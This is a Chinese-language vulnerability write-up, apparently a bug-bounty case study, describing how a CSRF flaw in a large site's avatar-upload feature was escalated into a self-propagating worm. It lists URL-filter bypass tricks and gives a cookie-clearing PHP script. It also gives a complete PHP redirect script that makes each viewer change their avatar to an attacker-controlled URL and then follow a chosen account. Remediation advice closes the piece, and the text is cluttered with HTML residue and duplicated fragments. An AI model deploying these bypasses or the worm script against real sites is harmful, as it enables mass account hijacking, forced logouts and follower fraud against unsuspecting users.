CSRF漏洞利用升级：从低危到高危的蠕虫攻击分析<\/h1>

漏洞背景<\/h2>
本文记录了一个实际案例，展示了如何将一个最初被认为是低危的CSRF漏洞通过巧妙利用升级为高危漏洞的过程。该漏洞存在于某大型互联网公司的头像上传功能中，最终形成了可自我传播的蠕虫式攻击。<\/p>

漏洞发现<\/h2>

头像上传流程分析<\/h3>

目标系统的头像上传功能分为三个步骤：<\/p>

将头像图片上传到云存储，返回云上的地址<\/li>
通过另一个接口上传头像地址链接<\/li>

前端通过``显示头像<\/li> <\/ol>

初始漏洞点<\/h3>
问题出在第二步：当系统通过``标签加载头像时，实际上是发送一个GET请求。如果这个GET请求指向的是站内API，就可能触发该API的功能。<\/p>

漏洞利用过程<\/h2>

第一层限制与绕过<\/h3>

限制条件<\/strong>：系统要求头像URL必须以xxxcloud.net<\/code>开头<\/p>

绕过方法<\/strong>：<\/p>

使用@<\/code>符号绕过：http:\/\/xxxcloud.net@vps.hacker\/<\/code> 服务端会将@<\/code>前的内容解析为用户名<\/li> <\/ul> <\/li> 其他常用绕过方法： http:\/\/www.hack.com?@qq.com<\/code>（浏览器会在?<\/code>前添加\/<\/code>）<\/li> http:\/\/hack.com\.www.qq.com<\/code>（浏览器会将\<\/code>转为\/<\/code>）<\/li> http:\/\/www.qq.com\/..\/hack.com<\/code>（目录穿越）<\/li> http:\/\/hack.com%df\/.qq.com<\/code>（宽字节绕过）<\/li> <\/ul> <\/li> <\/ol> 第二层限制与绕过<\/h3> 限制条件<\/strong>：URL必须以.png<\/code>、.jpg<\/code>或.gif<\/code>结尾<\/p> 绕过方法<\/strong>：<\/p> 使用查询参数：?&<无关紧要的参数>=.jpg<\/code><\/li> <\/ul> 初步利用：拒绝服务攻击<\/h2> 方法一：直接调用logout接口<\/h3> 发现论坛的退出接口\/api\/logout<\/code>虽然设计为POST传参，但实际接受GET请求<\/li> 构造攻击使受害者访问攻击者路由时302跳转到\/api\/logout<\/code><\/li> 效果：任何看到攻击者评论的用户都会自动退出登录<\/li> <\/ul> 方法二：通过Cookie清除<\/h3> 在VPS上创建PHP脚本清除所有Cookie：<\/li> <\/ul> <?<\/span>php<\/span> <\/span><\/span>if<\/span> (isset<\/span>($_COOKIE)) { <\/span><\/span> foreach<\/span> ($_COOKIE as<\/span> $name =><\/span> $value) { <\/span><\/span> setcookie<\/span>($name, ''<\/span>, time<\/span>() -<\/span> 86400<\/span>, '\/'<\/span>); <\/span><\/span> } <\/span><\/span>} <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre> 原理：将Cookie过期时间设为过去，使浏览器自动删除<\/li> <\/ul> 漏洞升级：蠕虫式传播<\/h2> 关键发现<\/h3> 修改头像的接口虽然默认使用POST，但也接受GET请求： api.*****.com\/v1.1\/avaimageupload.api?product=*****&imageUrl=***vps\/**.png&blogId=***<\/code><\/li> <\/ul> 蠕虫传播机制<\/h3> 攻击者设置头像指向修改头像的API<\/li> 其他用户查看攻击者头像时，会自动将自己的头像也改为指向修改头像的API<\/li> 这些用户成为新的传播节点，继续感染其他查看他们头像的用户<\/li> 形成指数级传播的蠕虫效果<\/li> <\/ol> 全站级攻击实现<\/h3> 修改VPS上的POC脚本，先让用户修改头像（第一次访问）<\/li> 然后让用户执行退出操作（第二次访问）<\/li> 最终实现全站用户的自动退出<\/li> <\/ul> 高级利用：恶意刷关注<\/h2> 发现关注接口漏洞<\/h3> 关注接口\/v1.1\/follow.api<\/code>也接受GET请求<\/li> 可构造请求自动让用户关注指定账号<\/li> <\/ul> 组合利用<\/h3> 通过接口https:\/\/****\/*****\/web\/all.json?key=<username><\/code>获取高赞博主的blogid<\/li> 定向感染高粉丝博主<\/li> 修改POC为关注攻击者账号的请求<\/li> 实现大规模自动关注<\/li> <\/ol> 完整攻击脚本示例<\/h2> <?<\/span>php<\/span> <\/span><\/span>session_start<\/span>(); <\/span><\/span>$ip =<\/span> $_SERVER['REMOTE_ADDR'<\/span>]; <\/span><\/span>$referer =<\/span> isset<\/span>($_SERVER['HTTP_REFERER'<\/span>]) ?<\/span> $_SERVER['HTTP_REFERER'<\/span>] :<\/span> ''<\/span>; <\/span><\/span> <\/span><\/span>\/\/ 定义跳转URL <\/span><\/span><\/span><\/span>$firstRedirect =<\/span> "https:\/\/api.*****.com\/v1.1\/avaimageupload.api?product=*****-android-8.1.9&imageUrl=www.7ntsec.cn\/avaimg.*****.net\/location_check.php&blogId=2267493166"<\/span>; <\/span><\/span>$secondRedirect =<\/span> "https:\/\/api.*****.com\/v1.1\/follow.api?followtype=follow&product=*****-android-8.1.9&targetblogid=529578359&blogdomain=*****gamer.*****.com"<\/span>; <\/span><\/span>$refererRedirect =<\/span> "https:\/\/avaimg.*****.net\/img\/"<\/span>; <\/span><\/span> <\/span><\/span>\/\/ 日志记录函数 <\/span><\/span><\/span><\/span>function<\/span> logAccess<\/span>($ip, $referer, $visitCount, $redirectUrl) { <\/span><\/span> $logFile =<\/span> ".\/access_log.txt"<\/span>; <\/span><\/span> $timestamp =<\/span> date<\/span>("Y-m-d H:i:s"<\/span>); <\/span><\/span> $logEntry =<\/span> "[<\/span>$timestamp<\/span>] IP: <\/span>$ip<\/span> | Referer: <\/span>$referer<\/span> | Visit Count: <\/span>$visitCount<\/span> | Redirect: <\/span>$redirectUrl\n<\/span>"<\/span>; <\/span><\/span> file_put_contents<\/span>($logFile, $logEntry, FILE_APPEND<\/span>); <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 根据Referer直接跳转 <\/span><\/span><\/span><\/span>if<\/span> (strpos<\/span>($referer, "gcweb.*****.com"<\/span>) !==<\/span> false<\/span>) { <\/span><\/span> logAccess<\/span>($ip, $referer, "N\/A"<\/span>, $refererRedirect); <\/span><\/span> header<\/span>("Location: <\/span>$refererRedirect<\/span>"<\/span>); <\/span><\/span> exit<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 记录访问次数 <\/span><\/span><\/span><\/span>if<\/span> (!<\/span>isset<\/span>($_SESSION['visit_count'<\/span>][$ip])) { <\/span><\/span> $_SESSION['visit_count'<\/span>][$ip] =<\/span> 1<\/span>; <\/span><\/span>} else<\/span> { <\/span><\/span> $_SESSION['visit_count'<\/span>][$ip]++<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 根据访问次数跳转 <\/span><\/span><\/span><\/span>if<\/span> ($_SESSION['visit_count'<\/span>][$ip] ==<\/span> 1<\/span>) { <\/span><\/span> logAccess<\/span>($ip, $referer, $_SESSION['visit_count'<\/span>][$ip], $firstRedirect); <\/span><\/span> header<\/span>("Location: <\/span>$firstRedirect<\/span>"<\/span>); <\/span><\/span> exit<\/span>; <\/span><\/span>} elseif<\/span> ($_SESSION['visit_count'<\/span>][$ip] ==<\/span> 2<\/span>) { <\/span><\/span> logAccess<\/span>($ip, $referer, $_SESSION['visit_count'<\/span>][$ip], $secondRedirect); <\/span><\/span> header<\/span>("Location: <\/span>$secondRedirect<\/span>"<\/span>); <\/span><\/span> exit<\/span>; <\/span><\/span>} <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>漏洞修复建议<\/h2> 严格区分GET和POST请求的用途，敏感操作只允许POST请求<\/li> 实施CSRF Token防护机制<\/li> 对用户提供的URL进行严格校验：验证完整域名而不仅是前缀<\/li> 禁止URL中包含特殊字符如@<\/code><\/li> 使用白名单方式校验文件扩展名<\/li> <\/ul> <\/li> 对API请求实施Referer检查<\/li> 敏感操作要求二次确认<\/li> <\/ol> 总结<\/h2> 本案例展示了如何通过以下方式将低危CSRF漏洞升级为高危漏洞：<\/p> 发现并绕过多层URL过滤<\/li> 利用GET请求本应使用POST的接口<\/li> 构造自我传播的蠕虫机制<\/li> 组合多个接口功能实现更大危害<\/li> <\/ol> 最终该漏洞被评为高危，凸显了即使是看似简单的CSRF漏洞，在特定条件下也可能造成严重后果。<\/p>

CSRF漏洞利用升级：从低危到高危的蠕虫攻击分析<\/h1>

漏洞背景<\/h2> 本文记录了一个实际案例，展示了如何将一个最初被认为是低危的CSRF漏洞通过巧妙利用升级为高危漏洞的过程。该漏洞存在于某大型互联网公司的头像上传功能中，最终形成了可自我传播的蠕虫式攻击。<\/p>

漏洞发现<\/h2>

初始漏洞点<\/h3> 问题出在第二步：当系统通过``标签加载头像时，实际上是发送一个GET请求。如果这个GET请求指向的是站内API，就可能触发该API的功能。<\/p>

漏洞利用过程<\/h2>

初步利用：拒绝服务攻击<\/h2>

漏洞升级：蠕虫式传播<\/h2>

高级利用：恶意刷关注<\/h2>

漏洞背景<\/h2>
本文记录了一个实际案例，展示了如何将一个最初被认为是低危的CSRF漏洞通过巧妙利用升级为高危漏洞的过程。该漏洞存在于某大型互联网公司的头像上传功能中，最终形成了可自我传播的蠕虫式攻击。<\/p>

初始漏洞点<\/h3>
问题出在第二步：当系统通过``标签加载头像时，实际上是发送一个GET请求。如果这个GET请求指向的是站内API，就可能触发该API的功能。<\/p>